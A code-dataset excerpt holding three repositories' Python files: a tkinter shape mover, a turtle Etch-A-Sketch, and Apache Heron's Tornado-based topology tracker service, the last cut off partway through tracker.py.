"num_lines": 97,
"path": "/canvas.py",
"repo_name": "Nick-Seinsche/Shapes2D",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\nimport time\nimport polygon as poly\n\nroot = tk.Tk()\nentities = []\nentity_active = 0\nrunning = True\n\n\nclass entity:\n def __init__(self, cv, shape):\n global entity_active\n self.shape = shape # shape class from polygon\n self.cv = cv # canvas\n self.vx = 0 # x - velocity\n self.vy = 0 # y - velocity\n self.vr = 0 # rotation velocity\n self.color = 'black' # color\n entity_active = len(entities) # set active entity to current\n entities.append(self) # append entity to entity list\n self.id = cv.create_polygon(self.shape.get(), fill=self.color)\n\n def update(self):\n # update color\n if (entities.index(self) == entity_active) and self.color != 'red':\n self.color = 'red'\n elif (entities.index(self) != entity_active) and self.color == 'red':\n self.color = 'black'\n self.vx, self.vy, self.vr = 0, 0, 0\n self.inner_update()\n\n def inner_update(self):\n self.delete_id()\n self.shape.move(self.vx, self.vy, False)\n self.shape.rotate(self.vr)\n self.id = cv.create_polygon(self.shape.get(), fill=self.color)\n\n def delete_id(self):\n self.cv.delete(self.id)\n\n\ncv = tk.Canvas(root, width=800, height=600)\ncv.pack()\n\n# entities\nentity(cv, poly.regPolygon(100, 300, 60, 0, 5))\nentity(cv, poly.regStar(300, 300, 20, 0, 5, 2.3))\nentity(cv, poly.isoTriangle(500, 500, 70, 90, 0))\n\n\ndef callback(event):\n global entity_active, entities\n press = True if str(event.type) is 'KeyPress' else False\n if event.keycode == 87:\n entities[entity_active].vy = -2 if press else 0\n elif event.keycode == 83:\n entities[entity_active].vy = 2 if press else 0\n elif event.keycode == 65:\n entities[entity_active].vx = -2 if press else 0\n elif event.keycode == 68:\n entities[entity_active].vx = 2 if press else 0\n elif event.keycode == 81:\n entities[entity_active].vr = 0.03 if press else 0\n elif event.keycode == 69:\n entities[entity_active].vr = -0.03 if press else 0\n elif event.keycode == 32 and press:\n # entities[entity_active].color = 'black'\n entity_active = (entity_active + 1) % len(entities)\n # entities[entity_active].color = 'red'\n\n\ndef close(*ignore):\n \"\"\" Stops simulation loop and closes the window. \"\"\"\n global running\n running = False\n root.destroy()\n\n\ndef mainloop():\n t, dt = time.time(), 0\n while running:\n time.sleep(max(0.02 - dt, 0))\n tnew = time.time()\n t, dt = tnew, tnew - t\n for e in entities:\n e.update()\n cv.update()\n\n\nroot.bind('<KeyPress>', callback) # setting keylistener\nroot.bind('<KeyRelease>', callback) # setting keylistener\nroot.protocol(\"WM_DELETE_WINDOW\", close) # correctly close the window\n\n\nmainloop()\nroot.mainloop()\n"
}
] | 3 |
JoseRotsaert/EtchASketch
|
https://github.com/JoseRotsaert/EtchASketch
|
12f1cdd8d823b0c2873c06c23ad08c955ab81ffa
|
98e69daf9634cf404d643ab87063cb4347e5ab31
|
ab57432f958676b71f371849670d82889ff681aa
|
refs/heads/master
| 2023-03-27T05:53:40.113859 | 2021-03-27T21:01:03 | 2021-03-27T21:01:03 | 352,176,216 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6757532358169556,
"alphanum_fraction": 0.6843615770339966,
"avg_line_length": 16.424999237060547,
"blob_id": "3641ddc35c7cafee6ed3b6a71f1a5e16f9039b2f",
"content_id": "74de851f920192b136ae084cc7f2bcdfc3bf3f80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 697,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 40,
"path": "/main.py",
"repo_name": "JoseRotsaert/EtchASketch",
"src_encoding": "UTF-8",
"text": "from turtle import Turtle, Screen\n\ntim = Turtle()\nscreen = Screen()\n\n\ndef move_forward():\n tim.fd(10)\n\n\ndef move_backward():\n tim.bk(10)\n\n\ndef rotate_clockwise():\n current_heading = tim.heading()\n current_heading += 5\n tim.setheading(current_heading)\n\n\ndef rotate_counter_clockwise():\n current_heading = tim.heading()\n current_heading -= 5\n tim.setheading(current_heading)\n\n\ndef clear():\n screen.clear()\n tim.home()\n\n\nscreen.listen()\n\nscreen.onkey(key=\"w\", fun=move_forward)\nscreen.onkey(key=\"s\", fun=move_backward)\nscreen.onkey(key=\"a\", fun=rotate_counter_clockwise)\nscreen.onkey(key=\"d\", fun=rotate_clockwise)\nscreen.onkey(key=\"c\", fun=clear)\n\nscreen.exitonclick()\n"
}
] | 1 |
joshfischer1108/incubator-heron
|
https://github.com/joshfischer1108/incubator-heron
|
b79a1485fd3cb915d6b40828bf41e1e9e1308d1a
|
7f32cc532b17e9a44a2b1fa93e56b7cf105aa78f
|
25a5ad9528a5efd05d7992fc8ac25dbdcfae3e38
|
refs/heads/master
| 2023-03-03T13:06:58.430449 | 2021-05-24T12:48:06 | 2021-05-24T12:48:06 | 127,474,384 | 0 | 1 |
Apache-2.0
| 2018-03-30T21:24:37 | 2018-03-30T06:27:18 | 2018-03-30T20:10:28 | null |
[
{
"alpha_fraction": 0.6936802864074707,
"alphanum_fraction": 0.6959107518196106,
"avg_line_length": 33.93506622314453,
"blob_id": "5218cf27bcb21949bbcd877f74f7a19916e74d15",
"content_id": "345ee55437a91e75b0337311ad8723e27cddd6db",
"detected_licenses": [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8070,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 231,
"path": "/heron/tools/tracker/src/python/main.py",
"repo_name": "joshfischer1108/incubator-heron",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n''' main.py '''\nimport logging\nimport os\nimport signal\nimport sys\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.web\nfrom tornado.options import define\nfrom tornado.httpclient import AsyncHTTPClient\n\nfrom heron.tools.common.src.python.utils import config as common_config\nfrom heron.common.src.python.utils import log\nfrom heron.tools.tracker.src.python import constants\nfrom heron.tools.tracker.src.python import handlers\nfrom heron.tools.tracker.src.python import utils\nfrom heron.tools.tracker.src.python.config import Config, STATEMGRS_KEY\nfrom heron.tools.tracker.src.python.tracker import Tracker\n\nimport click\n\nLog = log.Log\n\nclass Application(tornado.web.Application):\n \"\"\" Tornado server application \"\"\"\n def __init__(self, config):\n\n AsyncHTTPClient.configure(None, defaults=dict(request_timeout=120.0))\n self.tracker = Tracker(config)\n self.tracker.synch_topologies()\n tornadoHandlers = [\n (r\"/\", handlers.MainHandler),\n (r\"/clusters\", handlers.ClustersHandler, {\"tracker\":self.tracker}),\n (r\"/topologies\", handlers.TopologiesHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/states\", handlers.StatesHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/info\", handlers.TopologyHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/logicalplan\", handlers.LogicalPlanHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/config\", handlers.TopologyConfigHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/containerfiledata\", handlers.ContainerFileDataHandler,\n {\"tracker\":self.tracker}),\n (r\"/topologies/containerfiledownload\", handlers.ContainerFileDownloadHandler,\n {\"tracker\":self.tracker}),\n (r\"/topologies/containerfilestats\",\n handlers.ContainerFileStatsHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/physicalplan\", handlers.PhysicalPlanHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/packingplan\", handlers.PackingPlanHandler, {\"tracker\":self.tracker}),\n # Deprecated. See https://github.com/apache/incubator-heron/issues/1754\n (r\"/topologies/executionstate\", handlers.ExecutionStateHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/schedulerlocation\", handlers.SchedulerLocationHandler,\n {\"tracker\":self.tracker}),\n (r\"/topologies/metadata\", handlers.MetaDataHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/runtimestate\", handlers.RuntimeStateHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/metrics\", handlers.MetricsHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/metricstimeline\", handlers.MetricsTimelineHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/metricsquery\", handlers.MetricsQueryHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/exceptions\", handlers.ExceptionHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/exceptionsummary\", handlers.ExceptionSummaryHandler,\n {\"tracker\":self.tracker}),\n (r\"/machines\", handlers.MachinesHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/pid\", handlers.PidHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/jstack\", handlers.JstackHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/jmap\", handlers.JmapHandler, {\"tracker\":self.tracker}),\n (r\"/topologies/histo\", handlers.MemoryHistogramHandler, {\"tracker\":self.tracker}),\n (r\"(.*)\", handlers.DefaultHandler),\n ]\n\n settings = dict(\n debug=True,\n serve_traceback=True,\n static_path=os.path.dirname(__file__)\n )\n tornado.web.Application.__init__(self, tornadoHandlers, **settings)\n Log.info(\"Tracker has started\")\n\n def stop(self):\n self.tracker.stop_sync()\n\n\ndef define_options(port: int, config_file: str) -> None:\n \"\"\" define Tornado global variables \"\"\"\n define(\"port\", default=port)\n define(\"config_file\", default=config_file)\n\n\ndef create_tracker_config(config_file: str, stmgr_override: dict) -> dict:\n # try to parse the config file if we find one\n config = utils.parse_config_file(config_file)\n if config is None:\n Log.debug(f\"Config file does not exists: {config_file}\")\n config = {STATEMGRS_KEY:[{}]}\n\n # update non-null options\n config[STATEMGRS_KEY][0].update(\n (k, v)\n for k, v in stmgr_override.items()\n if v is not None\n )\n return config\n\n\ndef show_version(_, __, value):\n if value:\n common_config.print_build_info()\n sys.exit(0)\n\n\[email protected]()\[email protected](\n \"--version\",\n is_flag=True,\n is_eager=True,\n expose_value=False,\n callback=show_version,\n)\[email protected]('--verbose', is_flag=True)\[email protected](\n '--config-file',\n help=\"path to a tracker config file\",\n default=os.path.join(utils.get_heron_tracker_conf_dir(), constants.DEFAULT_CONFIG_FILE),\n show_default=True,\n)\[email protected](\n '--port',\n type=int,\n default=constants.DEFAULT_PORT,\n show_default=True,\n help=\"local port to serve on\",\n)\[email protected](\n '--type',\n \"stmgr_type\",\n help=f\"statemanager type e.g. {constants.DEFAULT_STATE_MANAGER_TYPE}\",\n type=click.Choice(choices=[\"file\", \"zookeeper\"]),\n)\[email protected](\n '--name',\n help=f\"statemanager name e.g. {constants.DEFAULT_STATE_MANAGER_NAME}\",\n)\[email protected](\n '--rootpath',\n help=f\"statemanager rootpath e.g. {constants.DEFAULT_STATE_MANAGER_ROOTPATH}\",\n)\[email protected](\n '--tunnelhost',\n help=f\"statemanager tunnelhost e.g. {constants.DEFAULT_STATE_MANAGER_TUNNELHOST}\",\n)\[email protected](\n '--hostport',\n help=f\"statemanager hostport e.g. {constants.DEFAULT_STATE_MANAGER_HOSTPORT}\",\n)\ndef cli(\n config_file: str,\n stmgr_type: str,\n name: str,\n rootpath: str,\n tunnelhost: str,\n hostport: str,\n port: int,\n verbose: bool,\n) -> None:\n \"\"\"\n A HTTP service for serving data about clusters.\n\n The statemanager's config from the given config file can be overrided using\n options on this executable.\n\n \"\"\"\n\n log.configure(logging.DEBUG if verbose else logging.INFO)\n\n # set Tornado global option\n define_options(port, config_file)\n\n stmgr_override = {\n \"type\": stmgr_type,\n \"name\": name,\n \"rootpath\": rootpath,\n \"tunnelhost\": tunnelhost,\n \"hostport\": hostport,\n }\n config = Config(create_tracker_config(config_file, stmgr_override))\n\n # create Tornado application\n application = Application(config)\n\n # pylint: disable=unused-argument\n # SIGINT handler:\n # 1. stop all the running zkstatemanager and filestatemanagers\n # 2. stop the Tornado IO loop\n def signal_handler(signum, frame):\n # start a new line after ^C character because this looks nice\n print('\\n', end='')\n application.stop()\n tornado.ioloop.IOLoop.instance().stop()\n\n # associate SIGINT and SIGTERM with a handler\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n Log.info(\"Running on port: %d\", port)\n if config_file:\n Log.info(\"Using config file: %s\", config_file)\n Log.info(f\"Using state manager:\\n{config}\")\n\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(port)\n\n tornado.ioloop.IOLoop.instance().start()\n\nif __name__ == \"__main__\":\n cli() # pylint: disable=no-value-for-parameter\n"
},
{
"alpha_fraction": 0.6320284605026245,
"alphanum_fraction": 0.6331405639648438,
"avg_line_length": 34.01557540893555,
"blob_id": "7b0f50f4034956933fd83c5b9e832b195a0e50a4",
"content_id": "4a3f36f8ea92843e12edf2a18867357b0c79c0c2",
"detected_licenses": [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22480,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 642,
"path": "/heron/tools/tracker/src/python/tracker.py",
"repo_name": "joshfischer1108/incubator-heron",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- encoding: utf-8 -*-\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n''' tracker.py '''\nimport json\nimport sys\nimport collections\n\nfrom functools import partial\nfrom typing import Any, Dict, List, Optional, Tuple\n\nfrom heron.common.src.python.utils.log import Log\nfrom heron.proto import topology_pb2\nfrom heron.statemgrs.src.python import statemanagerfactory\nfrom heron.tools.tracker.src.python.config import EXTRA_LINK_FORMATTER_KEY, EXTRA_LINK_URL_KEY\nfrom heron.tools.tracker.src.python.topology import Topology\nfrom heron.tools.tracker.src.python import utils\n\nimport javaobj.v1 as javaobj\n\ndef convert_pb_kvs(kvs, include_non_primitives=True) -> dict:\n \"\"\"\n converts pb kvs to dict\n \"\"\"\n config = {}\n for kv in kvs:\n if kv.value:\n config[kv.key] = kv.value\n elif kv.serialized_value:\n # add serialized_value support for python values (fixme)\n\n # is this a serialized java object\n if topology_pb2.JAVA_SERIALIZED_VALUE == kv.type:\n jv = _convert_java_value(kv, include_non_primitives=include_non_primitives)\n if jv is not None:\n config[kv.key] = jv\n else:\n config[kv.key] = _raw_value(kv)\n return config\n\n\ndef _convert_java_value(kv, include_non_primitives=True):\n try:\n pobj = javaobj.loads(kv.serialized_value)\n if isinstance(pobj, str):\n return pobj\n\n if isinstance(pobj, javaobj.transformers.DefaultObjectTransformer.JavaPrimitiveClass):\n return pobj.value\n\n if include_non_primitives:\n # java objects that are not strings return value and encoded value\n # Hexadecimal byte array for Serialized objects that\n return {\n 'value' : json.dumps(pobj,\n default=lambda custom_field: custom_field.__dict__,\n sort_keys=True,\n indent=2),\n 'raw' : kv.serialized_value.hex()}\n\n return None\n except Exception:\n Log.exception(\"Failed to parse data as java object\")\n if include_non_primitives:\n return _raw_value(kv)\n return None\n\ndef _raw_value(kv):\n return {\n # The value should be a valid json object\n 'value' : '{}',\n 'raw' : kv.serialized_value.hex()}\n\n\nclass Tracker:\n \"\"\"\n Tracker is a stateless cache of all the topologies\n for the given state managers. It watches for\n any changes on the topologies, like submission,\n killing, movement of containers, etc..\n\n This class caches all the data and is accessed\n by handlers.\n \"\"\"\n\n def __init__(self, config):\n self.config = config\n self.topologies = []\n self.state_managers = []\n\n # A map from a tuple of form\n # (topology_name, state_manager_name) to its\n # info, which is its representation\n # exposed through the APIs.\n # The state_manager_name help when we\n # want to remove the topology,\n # since other info can not be relied upon.\n self.topology_infos: Dict[Tuple[str, str], Any] = {}\n\n def synch_topologies(self) -> None:\n \"\"\"\n Sync the topologies with the statemgrs.\n \"\"\"\n self.state_managers = statemanagerfactory.get_all_state_managers(self.config.statemgr_config)\n try:\n for state_manager in self.state_managers:\n state_manager.start()\n except Exception as e:\n Log.critical(f\"Found exception while initializing state managers: {e}\", exc_info=True)\n sys.exit(1)\n\n def on_topologies_watch(state_manager, topologies) -> None:\n \"\"\"watch topologies\"\"\"\n Log.info(\"State watch triggered for topologies.\")\n Log.debug(\"Topologies: \" + str(topologies))\n cached_names = [t.name for t in self.get_stmgr_topologies(state_manager.name)]\n Log.debug(f\"Existing topologies: {cached_names}\")\n for name in cached_names:\n if name not in topologies:\n Log.info(\"Removing topology: %s in rootpath: %s\",\n name, state_manager.rootpath)\n self.remove_topology(name, state_manager.name)\n\n for name in topologies:\n if name not in cached_names:\n self.add_new_topology(state_manager, name)\n\n for state_manager in self.state_managers:\n # The callback function with the bound\n # state_manager as first variable.\n onTopologiesWatch = partial(on_topologies_watch, state_manager)\n state_manager.get_topologies(onTopologiesWatch)\n\n def stop_sync(self) -> None:\n for state_manager in self.state_managers:\n state_manager.stop()\n\n def get_topology(\n self,\n cluster: str,\n role: Optional[str],\n environ: str,\n topology_name: str,\n ) -> Any:\n \"\"\"\n Find and return the topology given its cluster, environ, topology name, and\n an optional role.\n Raises exception if topology is not found, or more than one are found.\n \"\"\"\n topologies = [t for t in self.topologies if t.name == topology_name\n and t.cluster == cluster\n and (not role or t.execution_state.role == role)\n and t.environ == environ]\n if len(topologies) != 1:\n if role is not None:\n raise Exception(\"Topology not found for {0}, {1}, {2}, {3}\".format(\n cluster, role, environ, topology_name))\n raise Exception(\"Topology not found for {0}, {1}, {2}\".format(\n cluster, environ, topology_name))\n\n # There is only one topology which is returned.\n return topologies[0]\n\n def get_stmgr_topologies(self, name: str) -> List[Any]:\n \"\"\"\n Returns all the topologies for a given state manager.\n \"\"\"\n return [t for t in self.topologies if t.state_manager_name == name]\n\n def add_new_topology(self, state_manager, topology_name: str) -> None:\n \"\"\"\n Adds a topology in the local cache, and sets a watch\n on any changes on the topology.\n \"\"\"\n topology = Topology(topology_name, state_manager.name)\n Log.info(\"Adding new topology: %s, state_manager: %s\",\n topology_name, state_manager.name)\n self.topologies.append(topology)\n\n # Register a watch on topology and change\n # the topology_info on any new change.\n topology.register_watch(self.set_topology_info)\n\n # Set watches on the pplan, execution_state, tmanager and scheduler_location.\n state_manager.get_pplan(topology_name, topology.set_physical_plan)\n state_manager.get_packing_plan(topology_name, topology.set_packing_plan)\n state_manager.get_execution_state(topology_name, topology.set_execution_state)\n state_manager.get_tmanager(topology_name, topology.set_tmanager)\n state_manager.get_scheduler_location(topology_name, topology.set_scheduler_location)\n\n def remove_topology(self, topology_name: str, state_manager_name: str) -> None:\n \"\"\"\n Removes the topology from the local cache.\n \"\"\"\n topologies = []\n for top in self.topologies:\n if (top.name == topology_name and\n top.state_manager_name == state_manager_name):\n # Remove topology_info\n if (topology_name, state_manager_name) in self.topology_infos:\n self.topology_infos.pop((topology_name, state_manager_name))\n else:\n topologies.append(top)\n\n self.topologies = topologies\n\n def extract_execution_state(self, topology) -> dict:\n \"\"\"\n Returns the repesentation of execution state that will\n be returned from Tracker.\n\n It looks like this has been replaced with extract_metadata and\n extract_runtime_state.\n\n \"\"\"\n result = self.extract_metadata(topology)\n result.update({\n \"has_physical_plan\": None,\n \"has_tmanager_location\": None,\n \"has_scheduler_location\": None,\n })\n return result\n\n def extract_metadata(self, topology) -> dict:\n \"\"\"\n Returns metadata that will be returned from Tracker.\n \"\"\"\n execution_state = topology.execution_state\n metadata = {\n \"cluster\": execution_state.cluster,\n \"environ\": execution_state.environ,\n \"role\": execution_state.role,\n \"jobname\": topology.name,\n \"submission_time\": execution_state.submission_time,\n \"submission_user\": execution_state.submission_user,\n \"release_username\": execution_state.release_state.release_username,\n \"release_tag\": execution_state.release_state.release_tag,\n \"release_version\": execution_state.release_state.release_version,\n \"extra_links\": [],\n }\n\n for extra_link in self.config.extra_links:\n link = extra_link.copy()\n link[EXTRA_LINK_URL_KEY] = self.config.get_formatted_url(link[EXTRA_LINK_FORMATTER_KEY],\n metadata)\n metadata[\"extra_links\"].append(link)\n return metadata\n\n @staticmethod\n def extract_runtime_state(topology):\n # \"stmgrs\" listed runtime state for each stream manager\n # however it is possible that physical plan is not complete\n # yet and we do not know how many stmgrs there are. That said,\n # we should not set any key below (stream manager name)\n return {\n \"has_physical_plan\": bool(topology.physical_plan),\n \"has_packing_plan\": bool(topology.packing_plan),\n \"has_tmanager_location\": bool(topology.tmanager),\n \"has_scheduler_location\": bool(topology.scheduler_location),\n \"stmgrs\": {},\n }\n\n # pylint: disable=no-self-use\n def extract_scheduler_location(self, topology) -> dict:\n \"\"\"\n Returns the representation of scheduler location that will\n be returned from Tracker.\n \"\"\"\n schedulerLocation = {\n \"name\": None,\n \"http_endpoint\": None,\n \"job_page_link\": None,\n }\n\n if topology.scheduler_location:\n schedulerLocation[\"name\"] = topology.scheduler_location.topology_name\n schedulerLocation[\"http_endpoint\"] = topology.scheduler_location.http_endpoint\n schedulerLocation[\"job_page_link\"] = \\\n topology.scheduler_location.job_page_link[0] \\\n if topology.scheduler_location.job_page_link else \"\"\n\n return schedulerLocation\n\n def extract_tmanager(self, topology) -> dict:\n \"\"\"\n Returns the representation of tmanager that will\n be returned from Tracker.\n \"\"\"\n tmanagerLocation = {\n \"name\": None,\n \"id\": None,\n \"host\": None,\n \"controller_port\": None,\n \"server_port\": None,\n \"stats_port\": None,\n }\n if topology.tmanager:\n tmanagerLocation[\"name\"] = topology.tmanager.topology_name\n tmanagerLocation[\"id\"] = topology.tmanager.topology_id\n tmanagerLocation[\"host\"] = topology.tmanager.host\n tmanagerLocation[\"controller_port\"] = topology.tmanager.controller_port\n tmanagerLocation[\"server_port\"] = topology.tmanager.server_port\n tmanagerLocation[\"stats_port\"] = topology.tmanager.stats_port\n\n return tmanagerLocation\n\n # pylint: disable=too-many-locals\n def extract_logical_plan(self, topology):\n \"\"\"\n Returns the representation of logical plan that will\n be returned from Tracker.\n \"\"\"\n logicalPlan = {\n \"spouts\": {},\n \"bolts\": {},\n }\n\n # Add spouts.\n for spout in topology.spouts():\n spoutType = \"default\"\n spoutSource = \"NA\"\n spoutVersion = \"NA\"\n spoutConfigs = spout.comp.config.kvs\n spoutExtraLinks = []\n for kvs in spoutConfigs:\n if kvs.key == \"spout.type\":\n spoutType = javaobj.loads(kvs.serialized_value)\n elif kvs.key == \"spout.source\":\n spoutSource = javaobj.loads(kvs.serialized_value)\n elif kvs.key == \"spout.version\":\n spoutVersion = javaobj.loads(kvs.serialized_value)\n elif kvs.key == \"extra.links\":\n spoutExtraLinks = json.loads(javaobj.loads(kvs.serialized_value))\n\n spoutPlan = {\n \"config\": convert_pb_kvs(spoutConfigs, include_non_primitives=False),\n \"type\": spoutType,\n \"source\": spoutSource,\n \"version\": spoutVersion,\n \"outputs\": [\n {\"stream_name\": outputStream.stream.id}\n for outputStream in spout.outputs\n ],\n \"extra_links\": spoutExtraLinks,\n }\n logicalPlan[\"spouts\"][spout.comp.name] = spoutPlan\n\n # render component extra links with general params\n execution_state = {\n \"cluster\": topology.execution_state.cluster,\n \"environ\": topology.execution_state.environ,\n \"role\": topology.execution_state.role,\n \"jobname\": topology.name,\n \"submission_user\": topology.execution_state.submission_user,\n }\n\n for link in spoutPlan[\"extra_links\"]:\n link[EXTRA_LINK_URL_KEY] = self.config.get_formatted_url(link[EXTRA_LINK_FORMATTER_KEY],\n execution_state)\n\n # Add bolts.\n for bolt in topology.bolts():\n boltName = bolt.comp.name\n logicalPlan[\"bolts\"][boltName] = {\n \"config\": convert_pb_kvs(bolt.comp.config.kvs, include_non_primitives=False),\n \"outputs\": [\n {\"stream_name\": outputStream.stream.id}\n for outputStream in bolt.outputs\n ],\n \"inputs\": [\n {\n \"stream_name\": inputStream.stream.id,\n \"component_name\": inputStream.stream.component_name,\n \"grouping\": topology_pb2.Grouping.Name(inputStream.gtype),\n }\n for inputStream in bolt.inputs\n ]\n }\n\n\n return logicalPlan\n\n # pylint: disable=too-many-locals\n def extract_physical_plan(self, topology):\n \"\"\"\n Returns the representation of physical plan that will\n be returned from Tracker.\n \"\"\"\n physicalPlan = {\n \"instances\": {},\n \"instance_groups\": {},\n \"stmgrs\": {},\n \"spouts\": {},\n \"bolts\": {},\n \"config\": {},\n \"components\": {}\n }\n\n if not topology.physical_plan:\n return physicalPlan\n\n spouts = topology.spouts()\n bolts = topology.bolts()\n stmgrs = None\n instances = None\n\n # Physical Plan\n stmgrs = list(topology.physical_plan.stmgrs)\n instances = list(topology.physical_plan.instances)\n\n # Configs\n if topology.physical_plan.topology.topology_config:\n physicalPlan[\"config\"] = convert_pb_kvs(topology.physical_plan.topology.topology_config.kvs)\n\n for spout in spouts:\n spout_name = spout.comp.name\n physicalPlan[\"spouts\"][spout_name] = []\n if spout_name not in physicalPlan[\"components\"]:\n physicalPlan[\"components\"][spout_name] = {\n \"config\": convert_pb_kvs(spout.comp.config.kvs)\n }\n for bolt in bolts:\n bolt_name = bolt.comp.name\n physicalPlan[\"bolts\"][bolt_name] = []\n if bolt_name not in physicalPlan[\"components\"]:\n physicalPlan[\"components\"][bolt_name] = {\n \"config\": convert_pb_kvs(bolt.comp.config.kvs)\n }\n\n for stmgr in stmgrs:\n host = stmgr.host_name\n cwd = stmgr.cwd\n shell_port = stmgr.shell_port if stmgr.HasField(\"shell_port\") else None\n physicalPlan[\"stmgrs\"][stmgr.id] = {\n \"id\": stmgr.id,\n \"host\": host,\n \"port\": stmgr.data_port,\n \"shell_port\": shell_port,\n \"cwd\": cwd,\n \"pid\": stmgr.pid,\n \"joburl\": utils.make_shell_job_url(host, shell_port, cwd),\n \"logfiles\": utils.make_shell_logfiles_url(host, shell_port, cwd),\n \"instance_ids\": []\n }\n\n instance_groups = collections.OrderedDict()\n for instance in instances:\n instance_id = instance.instance_id\n stmgrId = instance.stmgr_id\n name = instance.info.component_name\n stmgrInfo = physicalPlan[\"stmgrs\"][stmgrId]\n host = stmgrInfo[\"host\"]\n cwd = stmgrInfo[\"cwd\"]\n shell_port = stmgrInfo[\"shell_port\"]\n\n\n # instance_id format container_<index>_component_1\n # group name is container_<index>\n group_name = instance_id.rsplit(\"_\", 2)[0]\n igroup = instance_groups.get(group_name, list())\n igroup.append(instance_id)\n instance_groups[group_name] = igroup\n\n physicalPlan[\"instances\"][instance_id] = {\n \"id\": instance_id,\n \"name\": name,\n \"stmgrId\": stmgrId,\n \"logfile\": utils.make_shell_logfiles_url(host, shell_port, cwd, instance.instance_id),\n }\n physicalPlan[\"stmgrs\"][stmgrId][\"instance_ids\"].append(instance_id)\n if name in physicalPlan[\"spouts\"]:\n physicalPlan[\"spouts\"][name].append(instance_id)\n else:\n physicalPlan[\"bolts\"][name].append(instance_id)\n\n physicalPlan[\"instance_groups\"] = instance_groups\n\n return physicalPlan\n\n # pylint: disable=too-many-locals\n def extract_packing_plan(self, topology):\n \"\"\"\n Returns the representation of packing plan that will be returned from Tracker.\n\n \"\"\"\n packingPlan = {\n \"id\": \"\",\n \"container_plans\": []\n }\n\n if not topology.packing_plan:\n return packingPlan\n\n packingPlan[\"id\"] = topology.packing_plan.id\n packingPlan[\"container_plans\"] = [\n {\n \"id\": container_plan.id,\n \"instances\": [\n {\n \"component_name\" : instance_plan.component_name,\n \"task_id\" : instance_plan.task_id,\n \"component_index\": instance_plan.component_index,\n \"instance_resources\": {\n \"cpu\": instance_plan.resource.cpu,\n \"ram\": instance_plan.resource.ram,\n \"disk\": instance_plan.resource.disk,\n },\n }\n for instance_plan in container_plan.instance_plans\n ],\n \"required_resources\": {\n \"cpu\": container_plan.requiredResource.cpu,\n \"ram\": container_plan.requiredResource.ram,\n \"disk\": container_plan.requiredResource.disk,\n },\n \"scheduled_resources\": (\n {}\n if not container_plan else\n {\n \"cpu\": container_plan.scheduledResource.cpu,\n \"ram\": container_plan.scheduledResource.ram,\n \"disk\": container_plan.scheduledResource.disk,\n }\n ),\n }\n for container_plan in topology.packing_plan.container_plans\n ]\n\n return packingPlan\n\n def set_topology_info(self, topology) -> Optional[dict]:\n \"\"\"\n Extracts info from the stored proto states and\n convert it into representation that is exposed using\n the API.\n This method is called on any change for the topology.\n For example, when a container moves and its host or some\n port changes. All the information is parsed all over\n again and cache is updated.\n \"\"\"\n # Execution state is the most basic info.\n # If there is no execution state, just return\n # as the rest of the things don't matter.\n if not topology.execution_state:\n Log.info(\"No execution state found for: \" + topology.name)\n return\n\n Log.info(\"Setting topology info for topology: \" + topology.name)\n has_physical_plan = True\n if not topology.physical_plan:\n has_physical_plan = False\n\n Log.info(\"Setting topology info for topology: \" + topology.name)\n has_packing_plan = True\n if not topology.packing_plan:\n has_packing_plan = False\n\n has_tmanager_location = True\n if not topology.tmanager:\n has_tmanager_location = False\n\n has_scheduler_location = True\n if not topology.scheduler_location:\n has_scheduler_location = False\n\n topology_info = {\n \"name\": topology.name,\n \"id\": topology.id,\n \"logical_plan\": None,\n \"physical_plan\": None,\n \"packing_plan\": None,\n \"execution_state\": None,\n \"tmanager_location\": None,\n \"scheduler_location\": None,\n }\n\n execution_state = 